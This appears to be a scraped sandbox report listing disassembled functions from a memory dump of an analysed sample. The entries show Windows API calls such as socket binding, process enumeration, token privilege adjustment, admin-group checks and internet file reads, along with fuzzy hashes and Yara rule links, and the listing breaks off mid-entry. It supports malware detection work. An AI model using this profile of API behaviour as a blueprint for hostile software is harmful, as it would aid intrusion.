Instruction ID: 3bcbdba2b22f63be321d2c01c32a419c0600309b0aaa33f558d789ab0bb65dd5
Opcode Fuzzy Hash: f12a4e2eecb1e1a232b35d57b43ca2771095c4416a97a426c2468d06862f2a4d
Instruction Fuzzy Hash: AB518C35608A429FC718DFA9D8D0EAAB3E4FF4A324F144519F956873A1DB30ED04CB91

Function 001F6747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON

Download Yara Rule

APIs

Part of subcall function 001F7D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001F7DB6

socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 001F679E
WSAGetLastError.WSOCK32(00000000), ref: 001F67C7
bind.WSOCK32(00000000,?,00000010), ref: 001F6800
WSAGetLastError.WSOCK32(00000000), ref: 001F680D
closesocket.WSOCK32(00000000,00000000), ref: 001F6821

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorLast$bindclosesocketinet_addrsocket
String ID:
API String ID: 99427753-0
Opcode ID: b0cc9c175331574489d83eb19dfb5082c79dae23a67783c45ad6965a49e67752
Instruction ID: 3413042b670b36ab29f9292f7b3e81937950942b32b08ff1462325512db0c1f5
Opcode Fuzzy Hash: b0cc9c175331574489d83eb19dfb5082c79dae23a67783c45ad6965a49e67752
Instruction Fuzzy Hash: 4541C375A00204AFDB50BF649C86F7E77A89B15714F48855CFA16AB3D3CB709E008B91

Function 00205376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 002053C5
IsWindowEnabled.USER32 ref: 002053D3
GetForegroundWindow.USER32(?,?,00000001), ref: 002053E0
IsIconic.USER32 ref: 002053EE
IsZoomed.USER32 ref: 002053FC

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Window$EnabledForegroundIconicVisibleZoomed
String ID:
API String ID: 292994002-0
Opcode ID: 37bd83e2efa821eb0e686517b61fb59095989a1659d8e4bc6bd1baa92f9f6a80
Instruction ID: 8e48c81fbe3dc6af7e491db8da18105c5433e95f93cf47ccd80a9323bbba427a
Opcode Fuzzy Hash: 37bd83e2efa821eb0e686517b61fb59095989a1659d8e4bc6bd1baa92f9f6a80
Instruction Fuzzy Hash: D511B9313507215BD7316F269C48A6B7B98EF55791B444069F445D3283CBB09D118E94

Function 001D80A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001D80C0
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001D80CA
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001D80D9
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001D80E0
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001D80F6

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 4f2ae47f504521b0b4e471b3cf232b982dce6f7878d2f7e4a15df24f66f60b48
Instruction ID: 86d4cd2f724fbe6ba56900c3ff017ac367a26455aa9fa716cc89cc061236df7e
Opcode Fuzzy Hash: 4f2ae47f504521b0b4e471b3cf232b982dce6f7878d2f7e4a15df24f66f60b48
Instruction Fuzzy Hash: 50F06231380314AFEB304FA5EC8DE673BADEF49B55B000026F949C6251CB619C46DA60

Function 001EC397 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001EC432
CoCreateInstance.OLE32(00212D6C,00000000,00000001,00212BDC,?), ref: 001EC44A

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

CoUninitialize.OLE32 ref: 001EC6B7

Strings

.lnk, xrefs: 001EC3C6, 001EC3EE, 001EC3F8

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 8c3832d5c5733f698d542e4de820d2c0483fa12f32e36679e25c2a4ec879be55
Instruction ID: 59d2dd3f1750d063e6d1ded5dcb06f2eff3f28aefde7a35779ab53db922d064a
Opcode Fuzzy Hash: 8c3832d5c5733f698d542e4de820d2c0483fa12f32e36679e25c2a4ec879be55
Instruction Fuzzy Hash: 2AA15C71104205AFD300EF54C881EAFB7E8FFA9348F04491DF5569B2A2DB71EA49CB52

Function 00184B37 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00184AD0), ref: 00184B45
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00184B57

Strings

GetNativeSystemInfo, xrefs: 00184B51
kernel32.dll, xrefs: 00184B40

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: cdba3c10c1a334b905ed29e00a1905b844b8d87e0e51c2150ddb6bc54ad3e015
Instruction ID: f9f4cd2c4413ae419d277c9d7f7aa307842883bd59513a2b1f0e108eef48c586
Opcode Fuzzy Hash: cdba3c10c1a334b905ed29e00a1905b844b8d87e0e51c2150ddb6bc54ad3e015
Instruction Fuzzy Hash: BAD01234A50713CFD770AF31E918B06B6D4AF09355B1188399485D6991EB70D480CF54

Function 00193030 Relevance: 6.6, APIs: 4, Instructions: 587COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: fa366e0a02fa1775b4fccdfee6bb62346b7b7d9cd8f53a49dce75a8dad03f467
Instruction ID: bfc78f5aaa4712e9a355e1ce213255d116d846e716f8cf5219f821b93eb10058
Opcode Fuzzy Hash: fa366e0a02fa1775b4fccdfee6bb62346b7b7d9cd8f53a49dce75a8dad03f467
Instruction Fuzzy Hash: DA22CD716083019FCB24EF14C881B6FB7E5BFA9714F15492DF89A97291DB31EA04CB92

Function 001FEE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 001FEE3D
Process32FirstW.KERNEL32(00000000,?), ref: 001FEE4B

Part of subcall function 00187DE1: _memmove.LIBCMT ref: 00187E22

Process32NextW.KERNEL32(00000000,?), ref: 001FEF0B
CloseHandle.KERNEL32(00000000,?,?,?), ref: 001FEF1A

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 6c7d0d5979b735fa0a54b27020537cc160b09e77d6b81a4e853e831413c39462
Instruction ID: ca99f293ea0fe06d4746bf44e9ea19128a029e976fe0daf3a6df90d960332acd
Opcode Fuzzy Hash: 6c7d0d5979b735fa0a54b27020537cc160b09e77d6b81a4e853e831413c39462
Instruction Fuzzy Hash: 9C51A0715043059FD310EF24DC85E6BB7E8EFA4710F50482DF595972A2EB70EA08CB92

Function 001DE616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 001DE628

Strings

|, xrefs: 001DE658
(, xrefs: 001DE66E

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: f1dc611a744d0b305ae1f351d19918a360ba3a98570744d79ac88a9cf5e56b96
Instruction ID: 18aec9dd53c434918118c9b0dedded36e6ac5d87ee3d31079a378fefe28b14fb
Opcode Fuzzy Hash: f1dc611a744d0b305ae1f351d19918a360ba3a98570744d79ac88a9cf5e56b96
Instruction Fuzzy Hash: 56322575A007059FDB28DF59C4819AAB7F1FF48320B15C56EE89ADB3A1E770E941CB40

Function 001F22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,001F180A,00000000), ref: 001F23E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 001F2418

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 40756aca42a1300c84e3d7defd48a5aea50787578ec431e8eb70960578497ad3
Instruction ID: aeb725649130bfe8e3a344077754abc181c6b5ca6a591189f8a25e39a75d6be6
Opcode Fuzzy Hash: 40756aca42a1300c84e3d7defd48a5aea50787578ec431e8eb70960578497ad3
Instruction Fuzzy Hash: A141E4B1A0430DBFEB20DE95DC85EBBB7BDFB44314F10402AFB05A6141DBB99E419660

Function 001EB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 001EB343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001EB39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 001EB3EA

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 7836d615ac18555f097d844c12c26e661b93de686f468d699dd708efa49f47ac
Instruction ID: 42ffb4f1bcf152e4eefe20fb4535388345568068a9a7f772da5a37c7ecad2bd7
Opcode Fuzzy Hash: 7836d615ac18555f097d844c12c26e661b93de686f468d699dd708efa49f47ac
Instruction Fuzzy Hash: E3213235A00618DFCB00EFA5E885AEDFBB8FF49314F1480AAE905AB351DB319955CF51

Function 001D87E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 001A0DB6: std::exception::exception.LIBCMT ref: 001A0DEC
Part of subcall function 001A0DB6: __CxxThrowException@8.LIBCMT ref: 001A0E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001D882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001D8858
GetLastError.KERNEL32 ref: 001D8865

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: c5e554cc73ace2e3e517b701d301a44eafdad87d454c9a2ef5b36e3e6aebde58
Instruction ID: e998268b77842a393575d3288a81aec252f98b92c8d2311f8986e6d2f345fef0
Opcode Fuzzy Hash: c5e554cc73ace2e3e517b701d301a44eafdad87d454c9a2ef5b36e3e6aebde58
Instruction Fuzzy Hash: 9A118FB2814304AFE728EFA4EC85D6BB7FDEB45710B20852EF45597641EB30BC408B60

Function 001D874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 001D8774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001D878B
FreeSid.ADVAPI32(?), ref: 001D879B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 6b9f4cbd96f04e286526d0469632be517f560dee103d0e6c80603607b7b8dd0f
Instruction ID: e8de85240d40d307f49acc65bc2c5fe7d6da28029b513a99f2cbf7feee254d51
Opcode Fuzzy Hash: 6b9f4cbd96f04e286526d0469632be517f560dee103d0e6c80603607b7b8dd0f
Instruction Fuzzy Hash: 36F04975A5130CBFDF00DFF4DD89AAEBBBDEF08601F1044A9A901E2682E7716A048B50

Function 001E8889 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 001E889B

Part of subcall function 001A520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,001E8F6E,00000000,?,?,?,?,001E911F,00000000,?), ref: 001A5213
Part of subcall function 001A520A: __aulldiv.LIBCMT ref: 001A5233

Strings

0e$, xrefs: 001E8892

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID: 0e$
API String ID: 2893107130-4288890801
Opcode ID: a93cef8deac897999ad055eeafaa10505608eabfc38c4850bb20c93c7562189d
Instruction ID: 8e15eba14302933c1d701e9e7c74b70cbe68edc60ed9ae5dea3d9dfae2c592b1
Opcode Fuzzy Hash: a93cef8deac897999ad055eeafaa10505608eabfc38c4850bb20c93c7562189d
Instruction Fuzzy Hash: 9821D2366355108BC329CF29D845A52B3E1EFA6310B688E6CD5F9CB2C0CB74A945CB54

Function 001EC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 001EC6FB
FindClose.KERNEL32(00000000), ref: 001EC72B

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 52b7d8dc1c842edc4f0808b78caf8c30640a8cf0001c5b9aed0dcdc422d00559
Instruction ID: 50d1aa334885df481191954c438411ac94f365aec737077196c72b1970d2aae2
Opcode Fuzzy Hash: 52b7d8dc1c842edc4f0808b78caf8c30640a8cf0001c5b9aed0dcdc422d00559
Instruction Fuzzy Hash: F611A5716006449FDB10EF29D84592AF7E5FF55324F04851DF9A5C7291DB30AD05CF81

Function 001EA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,001F9468,?,0020FB84,?), ref: 001EA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,001F9468,?,0020FB84,?), ref: 001EA0A9

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 75a6952bdc6ba00a85deb9a97bb554ae676d6bf1b6c938ee1e17fb5569b8b9dc
Instruction ID: fc458b0db24f403ee71d9cc82d1b38576755a28629ff97a6a03f49b20ecce044
Opcode Fuzzy Hash: 75a6952bdc6ba00a85deb9a97bb554ae676d6bf1b6c938ee1e17fb5569b8b9dc
Instruction Fuzzy Hash: 10F08C3514522DBBDB61AFA4DC48FEE776CBF08361F008266F909D6181DB30AA40CBA1

Function 001D81CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,001D8309), ref: 001D81E0
CloseHandle.KERNEL32(?,?,001D8309), ref: 001D81F2

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 654e56787ebde330f96042b9634c4fdd1ace55fef730130e1024a9c9debe9b18
Instruction ID: 7a87e3ee278d2655e70aca813460b12f9daf85bd64180cd75c3e20e45b389ceb
Opcode Fuzzy Hash: 654e56787ebde330f96042b9634c4fdd1ace55fef730130e1024a9c9debe9b18
Instruction Fuzzy Hash: 7DE0E675014610AFEB662B60FC09D7777EEEF08310714886DF45584471DB715C91DB10

Function 001AA155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,001A8D57,?,?,?,00000001), ref: 001AA15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 001AA163

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0a08f3243979922e0a85d901944a9b7942ff39f635b211bd6c6d9b918b77e2f6
Instruction ID: 1e849dedb2cec3d093f2b344996ec583731547fc675c7de5ec46b0299d43b5f1
Opcode Fuzzy Hash: 0a08f3243979922e0a85d901944a9b7942ff39f635b211bd6c6d9b918b77e2f6
Instruction Fuzzy Hash: 4BB09231098348ABCA902B91FD0DB883F68EB45AB2F4040A0FE0D84862CB6254508A91

Function 001AF1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.0000000000234000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289612048.000000000023E000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289629987.0000000000247000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_180000_tNXl4XhgmV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f79ecd011805419015b0b921613339890b5eb43ac3b19892550b30026da69a0
Instruction ID: 1a66255b50ebbcc9ae9f6952df3da88c85ef272f81902bfe8a92508968129b76
Opcode Fuzzy Hash: 6f79ecd011805419015b0b921613339890b5eb43ac3b19892550b30026da69a0
Instruction Fuzzy Hash: 98323566D29F014DD7239634E836336A259AFB73C8F15D73BF81AB59A6EF28C5834100

Function 001B242E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1289506577.0000000000181000.00000020.00000001.01000000.00000004.sdmp, Offset: 00180000, based on PE: true

Associated: 00000001.00000002.1289488956.0000000000180000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1289566546.000000000020F000.00000002.00000001.01000000.00000004.sdmpDownload File
